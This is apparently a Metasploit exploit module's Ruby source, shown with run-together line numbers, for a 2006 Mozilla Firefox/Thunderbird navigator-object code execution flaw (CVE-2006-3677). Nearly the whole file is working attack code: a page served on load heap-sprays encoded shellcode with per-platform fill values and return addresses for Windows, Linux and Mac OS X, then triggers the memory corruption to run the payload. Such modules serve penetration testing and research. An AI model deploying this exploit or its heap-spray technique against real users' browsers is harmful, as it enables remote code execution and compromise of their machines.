Path: blob/master/modules/exploits/multi/browser/mozilla_navigatorjava.rb
19934 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::HttpServer::HTML910# include Msf::Exploit::Remote::BrowserAutopwn11# autopwn_info({12# :ua_name => HttpClients::FF,13# :ua_minver => "1.5.0",14# :ua_maxver => "1.5.1",15# :javascript => true,16# :rank => NormalRanking, # reliable memory corruption17# :vuln_test => %Q|18# is_vuln = false;19# if (navigator.javaEnabled()){20# is_vuln = true;21# }22# |,23# })2425def initialize(info = {})26super(27update_info(28info,29'Name' => 'Mozilla Suite/Firefox Navigator Object Code Execution',30'Description' => %q{31This module exploits a code execution vulnerability in the Mozilla32Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit33requires the Java plugin to be installed.34},35'License' => MSF_LICENSE,36'Author' => ['hdm'],37'References' => [38['CVE', '2006-3677'],39['OSVDB', '27559'],40['BID', '19192'],41['URL', 'http://www.mozilla.org/security/announce/mfsa2006-45.html']42],43'Payload' => {44'Space' => 512,45'BadChars' => "",46},47'Platform' => %w{win linux osx},48'Targets' => [49[50'Firefox 1.5.0.4 Windows x86',51{52'Platform' => 'win',53'Arch' => ARCH_X86,54'Ret' => 0x08000800,55'Fill' => "%u0800",56}57],58[59'Firefox 1.5.0.4 Linux x86',60{61'Platform' => 'linux',62'Arch' => ARCH_X86,63'Ret' => -0x58000000,64'Fill' => "%ua8a8",65}66],67[68'Firefox 1.5.0.4 Mac OS X PPC',69{70'Platform' => 'osx',71'Arch' => ARCH_PPC,72'Ret' => 0x0c000000,73'Fill' => "%u0c0c",74}75],76[77'Firefox 1.5.0.4 Mac OS X x86',78{79'Platform' => 'osx',80'Arch' => ARCH_X86,81'Ret' => 0x1c000000,82'Fill' => "%u1c1c",83}84],85],86'DisclosureDate' => '2006-07-25',87'Notes' => {88'Reliability' => UNKNOWN_RELIABILITY,89'Stability' => UNKNOWN_STABILITY,90'SideEffects' => UNKNOWN_SIDE_EFFECTS91}92)93)94end9596def on_request_uri(cli, request)97# Re-generate the payload98return if ((p = regenerate_payload(cli)) == nil)99100print_status("Sending #{self.name}")101send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })102103# Handle the payload104handler(cli)105end106107def generate_html(payload)108enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))109110return %Q|111<html><head>112<script>113function Exploit() {114if (window.navigator.javaEnabled) {115var shellcode = unescape("#{enc_code}");116var b = unescape("#{target['Fill']}");117while (b.length <= 0x400000) b+=b;118119var c = new Array();120for (var i =0; i<36; i++) {121c[i] =122b.substring(0, 0x100000 - shellcode.length) + shellcode +123b.substring(0, 0x100000 - shellcode.length) + shellcode +124b.substring(0, 0x100000 - shellcode.length) + shellcode +125b.substring(0, 0x100000 - shellcode.length) + shellcode;126}127128window.navigator = (#{target['Ret']} / 2);129try {130java.lang.reflect.Runtime.newInstance(131java.lang.Class.forName("java.lang.Runtime"), 0132);133}catch(e){134135}136}137}138</script>139</head><body onload='Exploit()'>Please wait...</body></html>140|141end142end143144145